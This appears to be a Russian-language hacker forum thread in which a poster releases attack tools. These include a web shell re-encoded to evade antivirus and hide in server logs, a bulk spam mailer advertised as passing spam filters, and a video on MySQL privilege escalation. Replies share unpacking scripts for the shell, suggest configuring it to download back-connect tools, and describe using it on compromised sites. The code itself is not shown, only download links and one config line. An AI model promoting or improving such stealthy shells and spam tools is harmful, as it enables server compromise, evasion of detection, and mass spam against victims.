Итак, прошу прощение за то, что в последнее время, вроде как, ничего нового от меня не поступало. Наверстываю упущенное: 1) Список проксей Наконец-то доработал скрипт сбора проксей. Каждый час берет публичные прокси из 3х источников, проверяет валидность, скорость соединение, страну и т.д. Старые удаляет, а свежие сохраняет в БД, так что кому на быструю руку нужны соксы, милости прошу http://madnet.name/tools/proxy/ 2) VIDEO Повышение прав, используя MySQL Скорее я его писал для тренировки в обработке видео, но тем не менее. Никак не могу выловить Zadoxik'а, поэтому надеюсь, он закинет видео отсюда Качаем, смотри, наслаждаемся http://madnet.name/files/3/14.html 1.7mb Старенькое видео об xss в set-cms http://madnet.name/files/3/13.html 2mb 3) с99madshell Наверное, самый приятный релиз. Какой шелл вы юзаете? r57shell? потому что он гоняет все в посте? Так ведь он очень неудобен, да и в последних версиях он все больше использует гет+баннеры+графика, в общем, ужас. Из всего многообразия я для себя подобрал c99shell. Что бы кто ни говорил он самый удобный, но есть много недочетов. a) Картинки, запустите скрипт с включенной графикой в браузере, и вы подарили админу в лог минимум 100 строчек запросов. b) Антивирусы, шеллы не должны палиться антивирусниками c) Размер, 162кб для шелла, это согласитесь перебор. d) GET, просто самый огромный недостаток, все данные посылаются method=GET Итак, после некоторых мучений представляю полностью переделанный шелл. a) Никакой лишней графики b) Скрипт полностью переписан+тело закодировано, так что забудем про антивирусы c) Удалено все лишнее+сжат, размер теперь 44кб сделал все что смог в) Никакого GET, абсолютно все запросы гоняются методом POST, что позволит сделать наш шелл в системе слабо заметным. Качаем отсюда http://madnet.name/files/1/10.html 4) TextForVideo Небольшая програмка для записи видео. Суть ее в следующем вы пишете в ней свой коментарий, а потом по нажатию горячей клавиши она вписывает коментарий в блокнот. Для того что-бы соответствовать событиям я сделал построчное разбиение, т.е, на каждой новой строке проги вы записываете фразу, которая должна быть выведена за раз. К примеру: Привет меня завут madnet сегодня я... ищем жертву. Будем работать с www.xxx.xxx Далее мы нажимаем на кнопку Запустить редактор Будет загружен Блокнот с вашим именем в качестве заголовка, которое вы выберете в поле Заголовок редактора Потом сворачиваем программу, она исчезает в трей. Теперь можно начинать запись. Все что остается сделать это нажимать на HotKey, которую вы установите в настройке, по умолчанию F9 Нажимаем ее в блокноте печатается надпись Привет меня завут madnet сегодня я... ищем жертву. Теперь вы делаете че там вам надо ищете и т.д., нашли жмем снова HOTKEY блокнот автоматов выносится на первый план и в нем появляется Будем работать с www.xxx.xxx Ну и так далее по тексту. http://madnet.name/files/2/12.html 5) Mailer Не подумайте что я спамер, просто был заказ написать спам скрипт. Вот мой spam скрипт, написан на php, работает через sendmail Возможности: Интеллектуальная рандомная генерация полей Рассылка с аттачем plane и html тип работа как с формами так и с файлами и т.д. Чел тестил на tut.by и yahoo.com разослал по 1 000 000 писем. Письма не были определены как спам. http://madnet.name/files/1/3.html Обо всех недочетах или пожеланиях пишем здесь, в ПМ или ICQ. Надеюсь, хоть что-то полезное вы здесь нашли для себя. С уважением madnet.
Мне понравился здесь список типов атак http://securityprobe.net/docs/2.html Может выложить его на античате? Автор кто? Согласен?
madnet выложи гденить шелл в txt чтоб удобно юзать было. Типа как rst (http://rst.void.ru/download/r57shell.txt)
Специально для поклонников шелла Маднета! С разрешения автора выкладываю два скрипта для распаковки\запаковки шелла, а также шелл в распакованном виде. http://sec-123.narod.ru/shells/c99madnet/for_decript_c99.php http://sec-123.narod.ru/shells/c99madnet/for_cript_c99.php http://sec-123.narod.ru/shells/c99madnet/c99madshell_no_cript.zip Теперь желающие смогут поправить его на свой вкус. Например, изменить константу Code: $c99sh_sourcesurl = "http://ccteam.ru/files/c99sh_sources/"; //Sources-server на свой сайт и грузить тулзы бэк-бинд-пайпа, которые не работают в оригинальном шелле. Также, Вы можете изменить алгоритм шифрования, или изменить стандартные 11 сжатий на , скажем, 150 Ах, вам не нравится шел Маднета? Вы уважаете шелл РСТ ? Ну, чтож. Там принцип сжатия аналогичен, теперь вы сможете сконструировать свой рст-шел под себя, а затем распаковать и вырезать гадские счётчики!
нет в этом смысла, но возможно, если мне хватит сил и времени, вскоре появится что-то новенькое и интересное в этом направлении!
Вот пользовал я год с99. и понял имхо что бэк коннект и бинд должны быть всегда внутри шелла. это очень часто спасает, а увеличивает скрипт на 3кб. и ещё очень бы хотелось запихать туда возможность обхода open_basedir. и вообще я лично не понимаю нах бекконнект убирать из скрипта? чтоб юзер потом сам скачал, раскодировал, доделывал, кодировал,? это бл.. игра какая то новая такая ? под названием "после сборки обточить напильником" чесслово .Маразм
Когда запускаю твою спамилку точнее просто открываею его на сайте вылазит во что Code: Cannot set time limit in safe mode in /home/global/domains/домен/public_html/files/madsp.php on line 8 Но прога роботает, пишет чьл разослано.
Для того, что бы скрипт работал столько, сколько нужно, надо что бы на сервере был выключен Safe mode
мде... сейчас вот нужно было файлик один посмотреть, шелл залил, а посмотреть не смог, т.к. имя файла плюсенг содержит... это наверно с тех пор осталось, когда с99 с Гет запросами работал (ну всмысле менял плюсенг на %2b)... надо бы исправить да и так недочеты есть, например файло сохраняет в туже папку где и шелл, а это имхо бывает критично, например залил я шелл через админку ну или еще как нить шелл залился а когда я его открываю, прав на запись (из шелла) в эту папку нет, а там еще и сейфмоде докучи... вобщем вот... а еще Sql клиент содержит недочеты А в целом хорошо, сделано все через пост, картинок нет, которые нах ненужны были вобщем если все доработать (ну там баги некторые устранить, тулзы типа бэкконект в шелл встроить, брутер опять же с обратными логинами сделать, можно еще и мускул брут сделать) хотя понимаю, что объять необъятное нельзя и всем неугодишь, буду только им пользоваться
Madnet Спасибо за спам скрипт. Действительно письма не определяются как спам. Но вот беда тип html не работает. До адресата доходить теги в открытом виде.
